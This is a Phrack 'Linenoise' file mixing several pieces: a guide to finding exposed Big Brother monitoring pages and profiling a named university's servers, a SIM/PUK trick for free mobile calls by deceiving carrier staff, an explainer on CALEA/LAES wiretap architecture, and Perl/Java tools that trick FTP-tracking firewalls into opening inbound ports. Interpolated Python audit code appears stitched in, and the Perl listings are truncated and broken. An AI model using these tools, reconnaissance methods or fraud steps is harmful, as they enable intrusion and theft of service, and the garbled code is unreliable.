
Phrack 60 File 03: Linenoise

                            ==Phrack Inc.==

               Volume 0x0b, Issue 0x3c, Phile #0x03 of 0x10

|=-----------------------=[ L I N E N O I S E ]=-------------------------=|
|=-------------------------=[ Phrack Staff ]=----------------------------=|

--[ Contents

  1 - The Dark Side of NTFS
  2 - Watching Big Brother
  3 - Free mobile calls
  4 - Lawfully Authorized Electronic Surveillance [LAES]
  5 - Java Tears down the Firewall

--[ 1 - The Dark Side of NTFS

Ok, this didn't fit anywhere else so we put it here:

--[ 2 - Watching Big Brother

        by da_knight <>

    Have you ever wanted to be the one doing the watching? If you are a
system administrator of UNIX / Linux servers, then you may be aware of a
product called Big Brother, which can be downloaded from ''.
This article is by no means technical, simply because it doesn't need to
be. It is divided into two sections, so bear with me for the briefing on
Big Brother (BB).

    BB is a program that will monitor various computer equipment; things it
can monitor are connectivity, cpu utilization, disk usage, ftp status, http
status, pop3 status, etc. As you might imagine, this information is very
important to an organization. BB is your standard client / server setup.
The server software can run on various flavors of UNIX, Linux and NT. The
client software is available for UNIX, Linux, NT, Mac, Novell, AS/400, and
VAXEN; some client software is provided by 3rd-party vendors and not
supported by BB4 Technologies.

    The cool thing about this is all of this information is viewed on a web
page. So, if you have multiple servers that you have to maintain, with this
product you would be able to go to one web page and quickly get a status of
all of those servers - pretty handy. When everything is fine your status is
"green", major problems are indicated by "red".

    Example: The connectivity (conn) status is done by pinging the
equipment in question; if the ping fails then it would appear as a red zit
on the web page. When tests such as this fail, BB can be configured to
automatically page the administrator.

Here is a quick run down of the statuses, listed in order of severity:

red    - Trouble; you've got problems.
purple - No report; the client hasn't responded in the last 30 minutes.
yellow - Attention; a threshold has been crossed.
green  - OK; take the day off.
clear  - Unavailable; the test has been turned off.
blue   - Disabled; notification for this test has been turned off.

    The status is also reflected in the title of the web page, so it only
takes one red zit to cause the web page title to start with "red:Big
Brother"; we're going to get into this in a minute.

    A common thing for administrators to do is to monitor their most
important systems with this product, as well as the most important aspects
of each system. If you have a web server, you would want to monitor the
http and conn statuses just to make sure people are still able to connect
to the server. Other tests I have seen are to check Oracle, or to list all
connected users. Hell, they even have a way to add weather reports. The
point is, it's pretty limitless what can be monitored, it just depends on
what you deem important.

    Now that you have a little bit of an understanding what BB can do, I
want to quote two things from BB4 Technologies (BB4) FAQ - Section 5:
Security Considerations (
Everything in that section of the FAQ should be considered, but we'll focus
on these two.

    "BB does not need to run as root. We suggest creating a user 'bb' and
running bb as that user." "We recommend password-protecting the Big Brother
web pages"

    So, you ask yourself, why are these things important to me? Well, one,
you know that administrators who run this software probably have it setup
using the user 'bb', and that they may also be running it with root level
access. This gives you a valid user account on a system and this account
probably wouldn't be used by a human very often so the password could be
something simple. But that's not the point of this article. The second
thing is that BB4 realizes the information on these web pages is extremely
important and they recommend password-protecting them.

    Following this logic, you then say: these are web pages, so they're
running on a web server, and if they're not password-protected and the
server is visible to the WWW, then... that's right, search engines will find
these pages and serve them up when you know what to look for.

    What are you waiting for? Go to '' and search for
"green:Big Brother" (include the quotes; it makes it more refined). You
will get about 16,200 matches. Now that doesn't mean that those are all
unique because it will have numerous pages from the same site, but you get
the point. I would estimate that there are over 200 sites that can be
viewed this way. Remember to search for all the other statuses too, just
change the name of the color. One more thing, I chose Google for a reason.
Some of these sites no longer run the BB product, but Google has a nice
ability to view cached pages, so you can still glean information from them.

    After you scroll through the list of sites you will realize that the
majority of them are either small ISPs or colleges. I'm going to pick on a
college, an Ivy League one, no less. I can tell you from looking at this
particular BB site that the BB server is running on a computer called
'' and the IP address is ''. Also the
computer '' is having some serious issues. How did I
find the IP address? Simple; if you click on the "green" or whatever color
button under the "conn" column, you will see a web page that has
information similar to this:

--------------------------------------------------------- - conn

green Sun Jun 30 01:33:15 EDT 2002 Connection OK  PING
( from : 56(84) bytes of data. 64 bytes
from icmp_seq=0 ttl=255 time=379 usec

--- ping statistics ---
1 packets transmitted, 1 packets received, 0% packet loss round-trip
min/avg/max/mdev = 0.379/0.379/0.379/0.000 ms


    Right there you know that the ping command was trying to ping
'', in this case, '' and that it came
from '' or ''. Let's see what else we can
find out.

    I can see that almost all of their servers run Tripwire, so they are
UNIX systems, and you probably would have a hard time creating a backdoor
account on these systems. On another page, we get to see the users who are
currently logged in. Currently we have 33 users logged in, and seeing as
it's 1:33 AM, I think some people left their computers logged in.

    I want to get more information about Yale's servers, so let's go back
to Google and look for another page from Yale, but this time look for
''. Now we can get some good information. When this site
is displayed you will see quite a few servers listed, as well as several
departments. If you want to know what software '' is
using to run its HTTP services, just click on the 'green' button:

---------------------------------------------------- - http

green Sun Jun 30 01:45:21 EDT 2002 - Server OK
HTTP/1.1 200 OK
Server: Microsoft-IIS/4.0
Content-Location: Date: Sun, 30
Jun 2002 05:45:21 GMT
Content-Type: text/html
Accept-Ranges: bytes
Last-Modified: Tue, 12 Jan 1999 20:49:40 GMT ETag:
Content-Length: 2226

Seconds: 0.01 


    What the hell? They're actually running IIS 4.0? Don't they know how
insecure that is? But I digress. From that information you know that the
server is some version of Windows NT and it has IIS 4.0 running, that could
be handy.

    Zelda is also showing they monitor printers. Now that can be fun; what
if the message "I think therefore I hack!" is sent to the printer
''? And in case you're wondering, the
printer is an 'HP LaserJet 4050 Series'; I just had to click on the button
under the "printer" column to find that out.

    Elsewhere on this same site, I find that several servers are running
TELNET, POP3, Oracle, FTP, and IMAP. Most of these services will gladly
tell you what version of the software they are running. Oracle, for
instance, is even nice enough to show you all of the connected users. How
can you thank them enough for this valuable information?

    Also, it seems only the geologists at Yale feel they have data that is
of great importance. I wasn't able to view what they monitor because of
access permissions on their web site, but I do know that they are running
their web server on Apache version 1.3.26.

    As you can see, I would be able to gather an enormous amount of vital
infrastructure data in a few minutes. Plus, I didn't break any laws. These
web pages are posted in a manner that the entire world can view them. It
might take someone 10 minutes or more to find out a few facts about 1
particular system, but in that amount of time I found numerous facts about
over 40 systems at the same organization. Thanks Big Brother!

    I feel it should be mentioned that the information found on these web
pages is information that most organizations don't even let employees
outside of the IT department see. I guess I should feel special since Yale
must feel that I'm not a security risk, otherwise they would have made me
authenticate to their web sites.

    Imagine this: an ISP that lists all of their routers complete with IPs
and model information. If you had that, you could possibly rely on
vulnerabilities in SNMP discovered earlier this year, or better yet, rely
on the default accounts / passwords setup on these types of devices. I only
bring this up because I know I did come across an ISP that did list routers
and the majority of the sites returned by Google seemed to be smaller ISPs.

    Also, about searching on Google, I would recommend searching for
"red:Big Brother", because these pages will always give you more
information than when the system is running perfectly.

    Finally, I didn't write this article to condone breaking into systems
and providing a means to that end. I wrote this because security is
extremely important; with the information that is found because of this one
product your environment could be compromised. If you are a system
administrator for a site that shows up on Google you may want to secure
your BB web pages, because by the time you read this the world is going to
know your infrastructure.
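
As an added self-check for administrators (my own example, not part of this article or of the BB product), the following classifies an HTTP response by its status code and by the "<colour>:Big Brother" title convention described above, and ranks several pages by the severity order given in the status list. The URLs and HTML snippets are constructed.

```python
import re
from typing import Iterable, Optional

# Severity order from the status list above, most severe first.
SEVERITY = ["red", "purple", "yellow", "green", "clear", "blue"]

# BB prefixes the page title with the worst status it is showing,
# e.g. "red:Big Brother" or "green:Big Brother".
TITLE_RE = re.compile(
    r"<title>\s*(red|purple|yellow|green|clear|blue)\s*:\s*Big Brother",
    re.IGNORECASE,
)


def bb_status_from_html(html: str) -> Optional[str]:
    """Return the status colour encoded in a BB page title, or None if the
    page does not follow Big Brother's title convention."""
    m = TITLE_RE.search(html)
    return m.group(1).lower() if m else None


def audit_bb_response(http_status: int, html: str) -> str:
    """Classify one fetched URL:
    'protected'   - the server demanded credentials (401) or refused (403),
                    which is what BB4's FAQ recommends;
    'exposed:<c>' - an unauthenticated BB page was served with status <c>;
    'not-bb'      - anything else."""
    if http_status in (401, 403):
        return "protected"
    if http_status != 200:
        return "not-bb"
    colour = bb_status_from_html(html)
    return f"exposed:{colour}" if colour else "not-bb"


def worst_status(colours: Iterable[str]) -> Optional[str]:
    """Most severe colour among several BB pages, in the article's order."""
    seen = set(colours)
    for colour in SEVERITY:
        if colour in seen:
            return colour
    return None


def audit_site(responses: dict) -> dict:
    """responses maps URL -> (http_status, body); returns which URLs are
    exposed (with their status), which are protected, and the worst status
    visible without authentication."""
    exposed, protected = {}, []
    for url, (status, body) in responses.items():
        verdict = audit_bb_response(status, body)
        if verdict.startswith("exposed:"):
            exposed[url] = verdict.split(":", 1)[1]
        elif verdict == "protected":
            protected.append(url)
    return {"exposed": exposed, "protected": protected,
            "worst": worst_status(exposed.values())}


def fetch_and_audit(url: str, timeout: float = 10.0) -> str:
    """Fetch a BB URL you administer and classify it (needs network access)."""
    import urllib.error
    import urllib.request
    try:
        with urllib.request.urlopen(url, timeout=timeout) as resp:
            body = resp.read().decode("utf-8", "replace")
            return audit_bb_response(resp.status, body)
    except urllib.error.HTTPError as err:
        return audit_bb_response(err.code, "")


# Constructed sample responses standing in for fetched pages.
SAMPLE_RESPONSES = {
    "http://bb.example.test/bb/": (200, "<html><title>red:Big Brother</title>"),
    "http://bb.example.test/bb/zelda.html": (200, "<TITLE>Green : Big Brother</TITLE>"),
    "http://bb2.example.test/bb/": (401, "Authorization Required"),
    "http://www.example.test/": (200, "<title>Welcome</title>"),
}

if __name__ == "__main__":
    summary = audit_site(SAMPLE_RESPONSES)
    for url, colour in summary["exposed"].items():
        print(f"EXPOSED ({colour}): {url}")
    print("protected:", summary["protected"])
    print("worst exposed status:", summary["worst"])
```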

--[ 3 - Free Mobile Calls

        by eurinomo

This bug can be utilized to make FREE CALLS, FREE SMS, and even FREE 

    First you have to see if your mobile network has the bug. Just call the
service's free number (so you don't waste money) and tell them that your
card is locked: that you forgot your phone in your little sister's room and
your mobile says "SIM card is locked" or something, and that maybe your
sister entered the wrong PUK because the phone was powered off and now it's
on. Then the guy should say that you have to go to one of their mobile
shops and explain the problem, and they will give you another card with the
same number and money as the old one. Ask them how much it will cost, and
the guy should say it's free! :-)

Now the material you'll need:
- A mobile phone that is not a Nokia (better if it's yours and not unlocked)
- And a Nokia (can be an unlocked one, or stolen or borrowed. Do as you wish!)

How to do it:

Mobile1 = Not nokia
Mobile2 = Nokia

Put the card in mobile1 and enter your PIN. When it has booted up, enter
this code 3 times:
or try

    Check the manual and search for the code to change the PUK if the above
examples don't work. Or email Motorola and say that you have a Motorola
phone and that you want to change the PUK and you know that there is a
code to change it (the code isn't illegal and it's also specified in the 

    If the code isn't the one I've given, it is one nearby. If you have a
Motorola Flare, when you enter **04* or **05* it will say "Enter the old PUK"
or something like that automatically and then ask for the new PUK code 2
times. But the important thing is to lock your card; I think you can also do
it if you enter the wrong PIN 3 times and then enter a wrong PUK, and voila,
it's locked! What I was saying about the code was tested, but you can try
this last one too; use it at your own risk.

    Now go to the mobile shop and say what happened (that your little sister
or a daughter of a friend of your mother or something like that...). Then
they will duplicate the card and give you the new one and the old one. At
least, they normally give you both.

    Now the easy part. Put the old card in the Nokia and boot it up, and
you'll see that it's not locked!!! If you put it in another phone that is
not a Nokia, it says that it's locked, so the bug is more of a Nokia bug
than a network bug. Now send an SMS with the old card and see if money was
deducted. Then see if it was deducted from the new card; if not, it's
because the network has the bug and you can spend the money on the old card
as you wish, but you only have 2 weeks or so before they cut it off the
network and it's completely locked. But the new card still has the same
money, and you can do it again and again; I think they wouldn't catch you.

This was tested in the Portugal Vodafone Mobile Phone Network.

--[ 4 - Introduction to Lawfully Authorized Electronic Surveillance (LAES)

           by Mystic <>

In 1994 Congress adopted the Communications Assistance for Law Enforcement
Act (CALEA). Its intent was to preserve but not expand the wiretapping
capabilities of law enforcement agencies by requiring telecommunication
providers to utilize systems that would allow government agencies a basic
level of access for the purpose of surveillance. The act however does not
only preserve the already existing capabilities of law enforcement to tap
communications, it enhances them, allowing the government to collect
information about wireless callers, tap wireless content, text messaging, and
packet communications. The standard that resulted from this legislation is
called Lawfully Authorized Electronic Surveillance or LAES.

A Telecommunications Service Provider (TSP) that is CALEA compliant
provides means to access the following services and information to Law
Enforcement Agencies (LEAs):

1. Non-call associated: Information about the intercept subjects that is
   not necessarily related to a call.

2. Call associated: call-identifying information about calls involving the
   intercept subjects.

3. Call associated and Non-call associated signaling information: Signaling
   information initiated by the subject or the network

4. Content surveillance: the ability to monitor the subjects'

This process is called the intercept function. The intercept function is
made up of 5 separate functions: access, delivery, collection, service
provider administration, and law enforcement administration.    

----[ 4.1  The Access Function (AF)

    The AF consists of one or more Intercept Access Points (IAPs) that
isolate the subject's communications or call-identifying information
unobtrusively. There are several different IAPs that can be utilized in
the intercept function. I have separated them into Call Associated and
Non-call Associated information IAPs and Content Surveillance IAPs:

Call Associated and Non-call Associated information IAPs

- Serving System IAP (SSIAP): gives non-call associated information.

- Call-Identifying Information IAP (IDIAP): gives call associated
  information in the form of the following call events for basic
  circuit calls:

  Answer             - A party has answered a call attempt
  Change             - The identity or identities of a call has changed
  Origination        - The system has routed a call dialed by the subject or
                       the system has translated a number for the subject
  Redirection        - A call has been redirected (e.g., forwarded,
                       diverted, or deflected)
  Release            - The facilities for the entire call have been released
  TerminationAttempt - A call attempt to an intercept subject has been
                       detected

- Intercept Subject Signaling IAP (ISSIAP): provides access to
  subject-initiated dialing and signaling information. This includes if the
  intercept subject uses call forwarding, call waiting, call hold, or
  three-way calling. It also gives the LEA the ability to receive the
  digits dialed by the subject.

- Network Signaling IAP (NSIAP): Allows the LEA to be informed about
  network messages that are sent to the intercept subject. These messages
  include busy, reorder, ringing, alerting, message waiting tone or visual
  indication, call waiting, calling or redirection name/number information,
  and displayed text.

Content Surveillance IAPs

   The following are content surveillance IAPs that transmit content using
a CCC or CDC. An interesting note about content surveillance is that
TSPs are not responsible for decrypting information that is encrypted by
the intercept subject unless the data was encrypted by the TSP and the
TSP has the means to decrypt it.

- Circuit IAP (CIAP): accesses call content of circuit-mode communications. 

- Conference Circuit IAP (CCIAP): Provides access to the content of
  subject-initiated Conference Call services such as three-way calling and
  multi-way calling.

- Packet Data IAP (PDIAP): Provides access to data packets sent or received
  by the intercept subject. These include the following services:

  ISDN user-to-user signaling
  ISDN D-channel X.25 packet services
  Short Message Services (SMS) for cellular and Personal Communication Services
  Wireless packet-mode data services (e.g., Cellular Digital Packet Data
        (CDPD), CDMA, TDMA, PCS1900, or GSM-based packet-mode data services)
  X.25 services
  TCP/IP services
  Paging (one-way or two-way)
  Packet-mode data services using traffic channels

----[ 4.2  The Delivery Function (DF)

   The DF is responsible for delivering intercepted communications to one
or more Collection Functions. This is done over two distinct types of
channels: Call Content Channels (CCCs) and Call Data Channels (CDCs).
The CCCs are generally used to transport call content such as voice or
data communications. CCCs are either "combined", meaning that they carry
transmit and receive paths on the same channel, or "separated", meaning
that transmit and receive paths are carried on separate channels. The
CDCs are generally used to transport messages which report
call-identifying information, as well as content which is text based,
such as Short Message Service (SMS). Information over CDCs is transmitted
using a protocol called the Lawfully Authorized Electronic Surveillance
Protocol (LAESP).

----[ 4.3  The Collection Function (CF)

   The CF is responsible for collecting and analyzing intercepted
communications and call-identifying information and is the
responsibility of the LEA.

----[ 4.4  The Service Provider Administration Function (SPAF)

   The SPAF is responsible for controlling the TSP's Access and Delivery Functions.

----[ 4.5  The Law Enforcement Administration Function (LEAF)

   The LEAF is responsible for controlling the LEA's Collection Function
and is the responsibility of the LEA.

   Now that I've introduced you to LAES lets look at an implementation of
it that is on the market right now and is being used by some TSPs:

Overview of the CALEAserver:

   The CALEAserver is manufactured by SS8 Networks. It is a collection and
delivery system for call information and content. It allows existing
networks to become completely CALEA compliant. It allows for a LEA to
monitor wireless and wire line communications and gather information about
the calls remotely. The CALEAserver interfaces with the network through
Signaling System 7 (SS7) which is an extension of the Public Switched
Telephone Network (PSTN). The CALEAserver is composed of three major
layers: the Hardware Platform Layer, the Network Platform Layer and the
Application Software Layer.

    The Hardware Platform Layer consists of the Switching Matrix and the
Computing Platform. The Switching Matrix is an industry standard
programmable switch. It contains T1 cards for voice transmission and cross
connect between switches, DSP cards for the conference circuits required
for the intercept and DTMF reception/generation, and CPU cards for
management of the switch. The Computing Platform is a simplex, rack
mounted, UNIX based machine. It is used to run the CALEAserver application
software that provides Delivery Function capabilities and controls the
Switching Matrix.

   The Network Platform Layer provides SS7 capability, as well as, call
processing APIs for the Application Software Layer. It also controls the
Switching Matrix.

   The Application Software Layer is where the Delivery and Service Provider
Administration functions are carried out. It isolates the interfaces
towards the Access and Collection Functions from the main delivery
functionality allowing for multiple Access and Collection Functions through
the Interface Modules that can be added or modified without impacting the
existing functionality.

System Capacity:

Configurable for up to: 

1000 Collection functions 
128 Access Function Interfaces 
32 SS7 links 
512 simultaneous call content intercepts on a single call basis 
64 T1 voice facilities 

Operating Environment: 

NEBS compliant, -48 volt, 19" rack mounted equipment 
Next-generation UltraSPARC processor 
66-MHz PCIbus 
Solaris UNIX operating system 
9Gbyte, 40-MB/sec SCSI disks 
512 Mbytes RAM standard 
Ethernet/Fast Ethernet, 10-BaseT and 100-BaseT 
Two RS-232C/RS-423 serial ports 
Programmable, scalable switch with up to 4000 port time slot interchange


Built in test tools for remote testing 
Full SS7 management system 
Alarm reporting and Error logging 
Automatic software fault recovery 
Automatic or manual disk backup 
SNMP support 
Optional support for X.25 and other collection function interfaces 
ITU standard MML and Java based GUI support 
Support of both circuit-switched and packet-switched networks 
Optional support for other access function interfaces as required for
         CALEA compliance, including: 
 *HLR (Home Location Register) 
 *VMS (Voice Mail System) 
 *SMS (Short Message System) 
 *CDPD wireless data 
 *Authentication Center 
 *Remote access provisioning 

   This concludes the introduction to LAES. This being only an introduction,
I've left out a lot of details like protocol information. However, if you
are interested in learning more about LAES I would suggest reading the TIA
standard J-STD-025A. I hope you learned a little bit more about the
surveillance capabilities of LEAs. If you have any questions feel free to
contact me. Email address: see above.

--[ 5 - Java tears down the Firewall

Recently there has been much hype about various insecurities in
firewalls which support tracking of FTP sessions. They could be
tricked into thinking someone was opening an FTP session by using
a second TCP stack, for example. I would point you to CERT-URL for
a complete discussion. There have been other techniques discussed,
such as embedding some evil tags in HTML files which make the
browser open connections a firewall could interpret as an FTP session.

Consider the following net:

[ Company ] ---- [ firewall ] --- [ some router ] --- [ WEB ]

Someone from 'Company' is browsing the web and has to pass his
packets across some router that is not under the control of Company
but of the attacker. Very common scenario, no?

A few tools have been compiled to circumvent such a setup.
I would even say, as soon as you enable FTP tracking you are lost.
More than one way leads to Rome.

Let me explain the small tools in short.

html-redirect: Attacker installs this on some router and
sets up a redirect rule to port 8888.

class-inject:  Attacker starts this with eftepe.class. html-redirect
will redirect the HTML requests to this mini-httpd. It forces the
browser inside Company, which is shielded by the firewall, to load
the Java applet. This applet simulates an active FTP session to
some router, and it is allowed to because the security manager sees
some router as the origin of eftepe.class. The firewall will then open
port 7350 inbound so you can connect from some router:20 to Company:7350.

ftpd: Attacker must run this on some router in order to simulate FTP

createclass: script to create the correct Java code which uses the
appropriate IP (of some router) and port (on Company) then

Attacker could also sit on WEB (i.e. :) and embed evil
Java applets. So take care because X runs on port 6000. :-)

It is really that simple, and it's not even worth an article of its own;
that's why you find it here as an add-on.

#!/usr/bin/perl -w

# Puts a classfile into remote browser

use IO::Socket;

sub usage
	print "Usage: $0 <class file>\n\n";

my $classfile = shift || usage();
my $class;
my $classlen = (stat($classfile))[7];
open I, "<$classfile" or die $!;
read I, $class, $classlen;
close I;

my $sock = new IO::Socket::INET->new(Listen => 10,
                                     LocalPort => 8080,
                                     Reuse => 1) or die $!;
my $conn;

for (;;) {
	next unless $conn = $sock->accept();
	if (fork() > 0) {
	my $request = <$conn>;
	if ($request =~ /$classfile/) {
		my $classcontent = "HTTP/1.0 200 OK\r\n".
		 "Server: Apache/1.3.6 (Unix)\r\n".
		 "Content-Length: $classlen\r\n".
		 "Content-Type: application/octet-stream\r\n\r\n".$class;
		print $conn $classcontent;
		print "Injected to ", $conn->peerhost(), "\n";
	} else {
		print $conn "<HTML>".
		            "<APPLET CODE=\"$classfile\" WIDTH=1 HEIGHT=1>".
#!/usr/bin/perl -w

$ENV{"PATH"} = $ENV{"PATH"}."/usr/lib/java/bin";

print "Creating apropriate Java class-file for opeing port > 1023\n";
print "Enter IP to connect to on port 21 (e.g. ''):";
my $ip = <STDIN>; chop($ip);
print "Enter port to open:";
my $port = <STDIN>; chop($port);
my $p1 = int $port/256;
my $p2 = $port%256;

open O, ">" or die $!;
print O<<EOF;

import java.applet.*;
import java.util.*;

public class eftepe extends Applet {

public void init()
	try {
		Socket s = new Socket("$ip", 21);
		OutputStream os = s.getOutputStream();
		BufferedReader in = new BufferedReader(new InputStreamReader(s.getInputStream()));
		PrintWriter pw = new PrintWriter(os, true);
		pw.println("USER ftp\\r\\n");
		pw.println("PASS ftp\\r\\n");
		String port = new String("PORT ");
		String me = InetAddress.getLocalHost().getHostAddress();
		port += me.replace('.', ',');
		port += ",$p1,$p2\\r\\n";
	} catch (Exception e) {


print "Compiling into classfile...\n";
print "Done. Results are in eftepe.class\n";


#!/usr/bin/perl -w

use IO::Socket;

my $sock = new IO::Socket::INET->new(Listen => 10,
                                     LocalPort => 21,
                                     Reuse => 1) or die $!;
my $conn;

for (;;) {
	$conn = $sock->accept();
	if (fork() > 0) {
	print $conn "220 ready\r\n";
	<$conn>;  # user
	print $conn "331 Password please\r\n";
	<$conn>;  # pass
	print $conn "230 Login successful\r\n";
	<$conn>;  #port
	print $conn "200 PORT command successful.\r\n";
	exit 0;

#!/usr/bin/perl -w

# Simple HTTP Redirector

# iptables -A PREROUTING -t nat -p tcp --dport 80 -j REDIRECT --to-port 8888

use IO::Socket;

sub usage
	print "Usage: $0 <IP|Host>\n".
	      "\t\tIP|Host -- IP or Host to redirect HTML reuests to\n\n";

my $r = shift || usage();
my $redir = "HTTP/1.0 301 Moved Permanently\r\n".
            "Location: http://$r:8080\r\n\r\n";

my $sock = new IO::Socket::INET->new(Listen => 10,
                                     LocalPort => 8888,
                                     Reuse => 1) or die $!;
my $conn;

for (;;) {
	next unless $conn = $sock->accept();
	if (fork() > 0) {
	my $request = <$conn>;
	print $conn "$redir";

#!/usr/bin/perl -w

use IO::Socket;

sub usage
	print "Usage: $0 <Host> <Port>\r\n";
	exit 0;

my $a = shift || usage();
my $b = shift || usage();

my $conn = IO::Socket::INET->new(PeerAddr => $a,
                                 PeerPort => $b,
                                 LocalPort => 20,
                                 Type => SOCK_STREAM,
                                 Proto => 'tcp') or die $!;

print $conn "GOTCHA\r\n";


# sample FTP session tracked firewall for 2.4 linux kernels
# modprobe ip_conntrack_ftp

iptables -F

iptables -A INPUT -p tcp --sport 21 -m state --state ESTABLISHED -j ACCEPT
iptables -A OUTPUT -p tcp --dport 21 -m state --state NEW,ESTABLISHED -j ACCEPT

iptables -A INPUT -p tcp --sport 20 -m state --state ESTABLISHED,RELATED -j ACCEPT
iptables -A OUTPUT -p tcp --dport 20 -m state --state ESTABLISHED -j ACCEPT

#iptables -A INPUT -p tcp --syn -j LOG
iptables -A INPUT -p tcp --syn -j DROP
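
To make concrete what the sample firewall above trusts when it accepts RELATED traffic from port 20, here is an added example (mine, not one of the article's tools) that parses RFC 959 PORT commands with the p1,p2 split createclass intends and applies the per-command checks a stateful FTP helper could make: the announced address must match the control connection's client, and the port must be unprivileged and not on a local never-expose list (X on 6000, as the text warns). The addresses are constructed; the applet scenario shows why these checks alone do not stop the trick described above, since the PORT command originates on the Company host itself.

```python
import re
from typing import Optional, Tuple

# RFC 959 PORT syntax: "PORT h1,h2,h3,h4,p1,p2", port = p1*256 + p2.
PORT_RE = re.compile(
    r"^PORT\s+(\d{1,3}),(\d{1,3}),(\d{1,3}),(\d{1,3}),(\d{1,3}),(\d{1,3})\s*$"
)

# Hypothetical local policy: unprivileged ports that must never be opened
# inbound by a helper. The article warns about X (6000); 6001 is added as a
# second display for illustration.
NEVER_EXPOSE = {6000, 6001}


def parse_port_command(line: str) -> Optional[Tuple[str, int]]:
    """Return (ip, port) for a well-formed PORT command, else None."""
    m = PORT_RE.match(line.strip())
    if not m:
        return None
    nums = [int(x) for x in m.groups()]
    if any(n > 255 for n in nums):
        return None
    return ".".join(str(n) for n in nums[:4]), nums[4] * 256 + nums[5]


def build_port_command(ip: str, port: int) -> str:
    """Inverse of the parser: the p1,p2 split that createclass intends."""
    if not 0 <= port <= 65535:
        raise ValueError(f"bad port {port}")
    return "PORT " + ip.replace(".", ",") + f",{port // 256},{port % 256}"


def helper_verdict(line: str, control_src_ip: str) -> Tuple[str, str]:
    """Decide whether an FTP helper should add a RELATED expectation for the
    data connection announced in `line`, seen on a control connection whose
    client side is `control_src_ip`. Returns (verdict, reason)."""
    parsed = parse_port_command(line)
    if parsed is None:
        return "ignore", "not a well-formed PORT command"
    ip, port = parsed
    if ip != control_src_ip:
        # Third-party case: the command announces some other host's address.
        return "reject", f"PORT address {ip} != control source {control_src_ip}"
    if port <= 1023:
        return "reject", f"port {port} is privileged"
    if port in NEVER_EXPOSE:
        return "reject", f"port {port} is on the never-expose list"
    return "accept", f"expect inbound server:20 -> {ip}:{port}"


def applet_scenario_verdict() -> Tuple[str, str]:
    """The article's case: the applet runs on the Company host itself, so the
    PORT it sends carries that host's own address and a port > 1023 (7350).
    Every per-command check above passes; the remaining controls are not
    enabling the helper for hosts that browse, or restricting RELATED
    acceptance to known FTP servers."""
    company_host = "192.0.2.10"  # constructed address for the browsing host
    cmd = build_port_command(company_host, 7350)
    return helper_verdict(cmd, company_host)


if __name__ == "__main__":
    # Constructed control-connection lines as a helper would see them.
    for cmd in ("PORT 192,0,2,10,28,182",   # 7350: passes the sanity checks
                "PORT 192,0,2,10,23,112",   # 6000: X display, rejected
                "PORT 192,0,2,99,28,182",   # third-party address, rejected
                "PORT 192,0,2,10,0,80"):    # privileged port, rejected
        print(cmd, "->", helper_verdict(cmd, "192.0.2.10"))
    print("applet scenario ->", applet_scenario_verdict())
```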

|=[ EOF ]=---------------------------------------------------------------=|
